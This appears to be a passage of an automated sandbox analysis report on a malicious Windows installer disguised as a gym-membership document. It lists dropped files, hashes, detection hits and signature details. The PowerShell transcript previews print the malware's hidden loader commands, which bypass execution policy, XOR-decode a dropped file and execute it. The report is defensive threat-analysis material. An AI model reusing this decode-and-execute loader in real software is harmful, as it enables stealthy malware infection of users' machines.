                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16852824
                                                                                                    Entropy (8bit):6.81149936180454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:6tGKFBfXhHQiYxSoJQCCdzlQEblI2rqNCFnWZYLjDkQ:kDFBfRgxS+CvQmIynWZRQ
                                                                                                    MD5:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    SHA1:180EF9CF27EB259954D2225B0621408A1E1F3F5E
                                                                                                    SHA-256:81F0C9FFF344742455596A5062FD6875B28BD9981469575164DF942F1C9AD2B2
                                                                                                    SHA-512:2E14902BE3B577A06E0A93700F2EB7E27EDF6F348958B8BD59F1FF9B3709AAF56AFE4BCB7224D0EDD6033308CD71ECF6744DD5782FD62F41859EB404F3212D96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                                                                    C:\Users\user\AppData\Roaming\pdata.txt
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114220
                                                                                                    Entropy (8bit):5.707140945604917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:1GWqoE8CWahf5yRan/di7eo87qI0C/xEwsXqsMdf:AakhvyRo8BI0C/xw6sy
                                                                                                    MD5:91ED8D6CFB3E06CC685B01055BF6C950
                                                                                                    SHA1:9A3D7228156D5E11C19F7CCDB9DB1C40189DA78E
                                                                                                    SHA-256:C8CB3473E8E124968D34F9D7FBF9F35DC295782B6DDFFE20F61AA3A35297A35A
                                                                                                    SHA-512:E86454BE52C40E1173BBED9D13FFCCFAAD60CEA82B2CED4EF2CA60057404D0534190C8C9A9716536C024DC1F2C0A877942780DC8B9FA967397B455E26546E900
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.jz31g9vN.20211004212906.txt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1853
                                                                                                    Entropy (8bit):5.755396216243982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BZQvjKoO6eOPAz5JEmatlVSN0ld7u9XhevW6qDYB1ZA:BZojKNjOy5CmwyN0lE9ERqDo1ZA
                                                                                                    MD5:7F6D32B5ECBAC9C7AFFE8AE8DFD58507
                                                                                                    SHA1:249EB51A60DC91211DEF193467B912C08A1AB98A
                                                                                                    SHA-256:AF538DC0C79539915663402ECFF050AE49BC467888FB239C49D2E871548ABF02
                                                                                                    SHA-512:403282ACC551E25DBBAE9B1C26C47DDA7346726ED89728CF3C2B8DE73800F2B610AED4A501F4D7D82F180A4CDAE6E3141D5DBDC6429D38A4F962597A5A1FEBC8
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211004212906..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: PowerShell.exe -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND $ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d
                                                                                                    C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2871
                                                                                                    Entropy (8bit):5.582984689481776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:BZuvvjKoO3kB3Nigkqw11tqDYB1Zo3kB3Nigkqw1xNEtXtdXta+ZXkxLAkaAXbxL:BZIjKN3kBfz23qDo1ZekBfz2xNEtXtdM
                                                                                                    MD5:CA9D82591B0074CA158333C003A56390
                                                                                                    SHA1:639BD6D58C7E27DB46DCACC49AAEF935B13C351E
                                                                                                    SHA-256:FE35362E4A512BD8165EB96516A36D76221197B0A22B8718B0621A9AFBC4DC0C
                                                                                                    SHA-512:72F927BF56975728D10086CEEE00AEFC374FA5F570E7D3BEE8FBBE03AAC976F395F2FB14E282B482C89AB94155BFE71AB1CD11CDD12DA3A2085373394DAFD173
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211004\PowerShell_transcript.377142.wm8KM1k2.20211004212820.txt, Author: Joe Security
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211004212821..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -windowstyle hidden -command $xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;..Process ID: 2212..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.
                                                                                                    C:\Windows\Installer\5206a8.msi
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9105408
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA
                                                                                                    MD5:F6118522893F3CD95198527D6F0282BA
                                                                                                    SHA1:DD9B59D2553043A4740B9CD557C7DDE0740050CF
                                                                                                    SHA-256:5CF24553E521DE102628E1EBDADB69A6623904F08B51CF5B1EA14779E03E8682
                                                                                                    SHA-512:CDDDBBA487B41D54CF117663A09DD13D374CF24EAECB16677EBE499051DD14CE5E51E65393D705C265F0A8B4234163ACB4A70E0A069848AD0D519B125393DBA4
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\5206a8.msi, Author: Joe Security
                                                                                                    C:\Windows\Installer\5206aa.msi
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9105408
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA
                                                                                                    MD5:F6118522893F3CD95198527D6F0282BA
                                                                                                    SHA1:DD9B59D2553043A4740B9CD557C7DDE0740050CF
                                                                                                    SHA-256:5CF24553E521DE102628E1EBDADB69A6623904F08B51CF5B1EA14779E03E8682
                                                                                                    SHA-512:CDDDBBA487B41D54CF117663A09DD13D374CF24EAECB16677EBE499051DD14CE5E51E65393D705C265F0A8B4234163ACB4A70E0A069848AD0D519B125393DBA4
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\5206aa.msi, Author: Joe Security
                                                                                                    C:\Windows\Installer\MSI113A.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2611862
                                                                                                    Entropy (8bit):6.341468656352278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:ewxcLDe+cpl7+GgYwxcLDe+cpl7+GgbwxcLDe+cpl7+Gg1:5a/MpZOa/MpZ7a/MpZG
                                                                                                    MD5:05B09F8961B3ABC2BD3B470ADD0239E2
                                                                                                    SHA1:AF0D98A648088DED33B9FF8946BBBCA479CEB932
                                                                                                    SHA-256:E57C330FA9ADB4B955CA7EAFBE7DD8165DE7C50B2BBC83944C1D0AFA46A10C0B
                                                                                                    SHA-512:5F676B8DC73F4F5687833800AB08502E7540FDB7E1B1EF5D218393174E12F0047305257316DFEB8A74B7A487B544A165EEE74CB4B4A31E10C8F26A94888067DE
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Windows\Installer\MSI113A.tmp, Author: Joe Security
                                                                                                    Preview: ...@IXOS.@.....@..DS.@.....@.....@.....@.....@.....@......&.{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..(EMCO EVALUATION PACKAGE) - V2%.Nyship-Empire-Plan-Gym-Membership.msi.@.....@.....@.....@........&.{549A417F-BD1F-4387-A76F-A86CCEF6964C}.....@.....@.....@.....@.......@.....@.....@.......@......(EMCO EVALUATION PACKAGE) - V2......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ECA_InstallRollback....J...ECA_InstallRollback.@.......C..MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w.......................
                                                                                                    C:\Windows\Installer\MSI11D7.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI1265.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI1A75.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI26BB.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSI294D.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Windows\Installer\MSID20.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Windows\Installer\MSIEE6.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Windows\Installer\MSIF74.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94
                                                                                                    Entropy (8bit):4.554905870839317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:MKVsPudd2OFNRgLLLC1wK+SOv:MKO2Tg321wK+SOv
                                                                                                    MD5:62A21E00C66B90344DB8925A3559B56D
                                                                                                    SHA1:8FA5E3B04A4B8DB7ADB07C1EE783DAC2955A136D
                                                                                                    SHA-256:CB7EA14D4C2F6AB6276EF2FFD314230C1F63E240FE14CF07756F0A71DC80A4B8
                                                                                                    SHA-512:D601E9E15EE365B846CCB450F81F04EF75D4FF702DCDA8DD86B929F13F5C7FDEDAB2955B84D520BC2660296F2AE43BF64D13F1F71CD6498A7CEC8C136D89D729
                                                                                                    Malicious:false
                                                                                                    Preview: 10/04/2021 21:28:10.344 [4660]: Setting MSI handle, install logging will go into the MSI log..
                                                                                                    \Device\ConDrv
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86279
                                                                                                    Entropy (8bit):3.6471037334207934
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:40Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/Y/YeW8Y/Y/YeW8Y/Y/YeW6:O
                                                                                                    MD5:815C31193D123FDBDF9FCFE22654922F
                                                                                                    SHA1:457B133655A80DE69BD51C576B1FC8ABB50AC79B
                                                                                                    SHA-256:EC15865AB8CC46808ACEA19B2EACDA82C008E4BD0E89F8243F803B038D79E9AC
                                                                                                    SHA-512:B378DEC010B7197CA8E674E4AF28FED50386E8C5E909BCE4687C336204E0EEF78DEF4452ABDB68DD8AE9977CA6E8F2A8AE39BD19E358FD37DD88A8EFBED234ED
                                                                                                    Malicious:false

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: (EMCO EVALUATION PACKAGE) - V2, Author: LTD, Keywords: Installer, Comments: This installer database contains the logic and data required to install (EMCO EVALUATION PACKAGE) - V2., Template: x64;1033, Revision Number: {549A417F-BD1F-4387-A76F-A86CCEF6964C}, Create Time/Date: Fri Oct 1 19:21:26 2021, Last Saved Time/Date: Fri Oct 1 19:21:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.10.1.2213), Security: 2
                                                                                                    Entropy (8bit):7.951722927372294
                                                                                                    TrID:
                                                                                                    • Microsoft Windows Installer (77509/1) 90.64%
                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                                    File name:Nyship-Empire-Plan-Gym-Membership.msi
                                                                                                    File size:9105408
                                                                                                    MD5:f6118522893f3cd95198527d6f0282ba
                                                                                                    SHA1:dd9b59d2553043a4740b9cd557c7dde0740050cf
                                                                                                    SHA256:5cf24553e521de102628e1ebdadb69a6623904f08b51cf5b1ea14779e03e8682
                                                                                                    SHA512:cdddbba487b41d54cf117663a09dd13d374cf24eaecb16677ebe499051dd14ce5e51e65393d705c265f0a8b4234163acb4a70e0a069848ad0d519b125393dba4
                                                                                                    SSDEEP:196608:Ea/OZSY8CGlknjT573H9O5FG0xapeshnYSwFXdTFwI1M:v/LTCWSRbdeZjshYSwFXdTCA

                                                                                                    File Icon

                                                                                                    Icon Hash:a2a0b496b2caca72

                                                                                                    Static OLE Info

                                                                                                    General

                                                                                                    Document Type:OLE
                                                                                                    Number of OLE Files:1

                                                                                                    Authenticode Signature

                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                    Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                                    Error Number:-2146762495
                                                                                                    Not Before, Not After
                                                                                                    • 9/3/2021 2:00:00 AM 8/25/2022 1:59:59 AM
                                                                                                    Subject Chain
                                                                                                    • CN=SN Pelletier Consulting Inc., O=SN Pelletier Consulting Inc., L=Marston, S=Quebec, C=CA, SERIALNUMBER=1000745-5, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:335C7BCF6D7363FB2420FFA6C37C9111
                                                                                                    Thumbprint SHA-1:B3989A6B973C0DEEDDDC240A58E3E53D71560FD6
                                                                                                    Thumbprint SHA-256:D728CDCDEFAEB2C5D53B4F290BA82F6BF66BF3A9415E4676E3EE2A13CBC7BE3F
                                                                                                    Serial:0839DC3E884FD7B0F441F0A5378ACFC0

                                                                                                    OLE File "Nyship-Empire-Plan-Gym-Membership.msi"

                                                                                                    Indicators

                                                                                                    Has Summary Info:True
                                                                                                    Application Name:Windows Installer XML Toolset (3.10.1.2213)
                                                                                                    Encrypted Document:False
                                                                                                    Contains Word Document Stream:False
                                                                                                    Contains Workbook/Book Stream:False
                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                    Contains Visio Document Stream:False
                                                                                                    Contains ObjectPool Stream:
                                                                                                    Flash Objects Count:
                                                                                                    Contains VBA Macros:False

                                                                                                    Summary

                                                                                                    Code Page:1252
                                                                                                    Title:Installation Database
